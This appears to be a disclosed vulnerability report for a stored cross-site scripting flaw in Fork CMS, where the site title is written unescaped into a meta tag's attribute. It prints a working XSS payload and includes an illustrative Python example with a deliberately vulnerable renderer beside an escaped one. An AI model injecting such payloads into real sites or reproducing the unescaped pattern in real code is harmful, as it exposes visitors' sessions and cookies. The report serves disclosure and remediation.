Cross-site Scripting (XSS) - Stored in forkcms/forkcms
Reported on
Oct 19th 2021
Description
Hello. Fork CMS does not escape the website title when it writes it into the page's meta tags. The stored value is inserted verbatim into the content attribute of the application-name meta tag, so a title containing a double quote and angle brackets breaks out of the attribute and injects arbitrary HTML, including script, into every rendered page of the site.
Proof of Concept
Setting the website title to the payload below makes the rendered <title> element look like this (the page name "Home" is prefixed by the CMS):
<title>Home - Hi'>"<script src=//xss></script><x="{9*9}\r\n%0A%09%0D<svg\onload=confirm(1)></title>
Inside <title> this is still harmless, because the title element's content is RCDATA and only a closing </title> would break out. The same value, however, is written unescaped into the content attribute of the application-name meta tag:
<meta name="application-name" content="Hi'>"<script src=//xss></script><x="{9*9}\r\n%0A%09%0D<svg\onload=confirm(1)>">
In this double-quoted attribute the character that matters is the unescaped `"`: it terminates the content value, and everything after it is parsed by the browser as markup rather than as attribute data.
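The following is an added illustration, not code from Fork CMS (which is written in PHP) or from the reporter. It renders the application-name meta tag from a stored site title both the vulnerable way (verbatim interpolation) and the fixed way (attribute-context escaping), then runs both through Python's HTML tokenizer to show which elements a parser actually sees. The function names and the two sample titles are constructed for the example; the hostile title keeps the part of the report's payload that does the work here, the `"` that closes the attribute.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs for the example (not real site data).
# HOSTILE_TITLE is a trimmed version of the report's payload: the leading
# double quote terminates content="..." and what follows becomes markup.
BENIGN_TITLE = 'Fork & Co "Home"'
HOSTILE_TITLE = '"><script src=//xss></script><svg onload=confirm(1)>'


def render_meta_vulnerable(site_title: str) -> str:
    """Vulnerable pattern: the stored title is interpolated verbatim into a
    double-quoted HTML attribute."""
    return f'<meta name="application-name" content="{site_title}">'


def render_meta_fixed(site_title: str) -> str:
    """Fixed pattern: attribute-context escaping turns & < > " ' into
    character references, so the value can never leave the attribute."""
    return f'<meta name="application-name" content="{html.escape(site_title, quote=True)}">'


class TagCollector(HTMLParser):
    """Records every start tag the tokenizer emits, with its attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.start_tags = []

    def handle_starttag(self, tag, attrs):
        self.start_tags.append((tag, dict(attrs)))


def tokenize(markup: str):
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.start_tags


def injected_elements(markup: str):
    """Names of any elements other than the single intended <meta> tag.
    A non-empty list means the title escaped its attribute."""
    return [tag for tag, _ in tokenize(markup) if tag != "meta"]


def meta_content(markup: str):
    """The content attribute as the parser decodes it (character references
    are resolved), or None if no <meta> was produced."""
    for tag, attrs in tokenize(markup):
        if tag == "meta":
            return attrs.get("content")
    return None


if __name__ == "__main__":
    for label, renderer in (("vulnerable", render_meta_vulnerable), ("fixed", render_meta_fixed)):
        for title in (BENIGN_TITLE, HOSTILE_TITLE):
            markup = renderer(title)
            print(f"{label:10} {markup}")
            print(f"{'':10} content={meta_content(markup)!r} injected={injected_elements(markup)}")
```

With the vulnerable renderer the hostile title yields a `script` and an `svg` element and an empty content attribute; with the fixed renderer the parser sees only the meta tag, and the decoded content attribute is exactly the stored title, for both the benign and the hostile input. The benign title also shows why this is a correctness bug and not only a security one: rendered verbatim, its inner `"` truncates the attribute to `Fork & Co `. The same round-trip property is what the PHP template in the CMS has to guarantee: escape for the attribute context at output time, rather than trying to sanitize the title on input.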
Impact
Anyone able to change the website title in the backend can store JavaScript that is delivered to every visitor of every page, since the application-name meta tag is part of the common page head. The browser cannot distinguish the injected script from the site's own, so it runs it in the site's origin: the script can read any cookies not marked HttpOnly, session tokens and other data the browser holds for the site, and perform actions in the victim's session, including that of an administrator viewing the front end.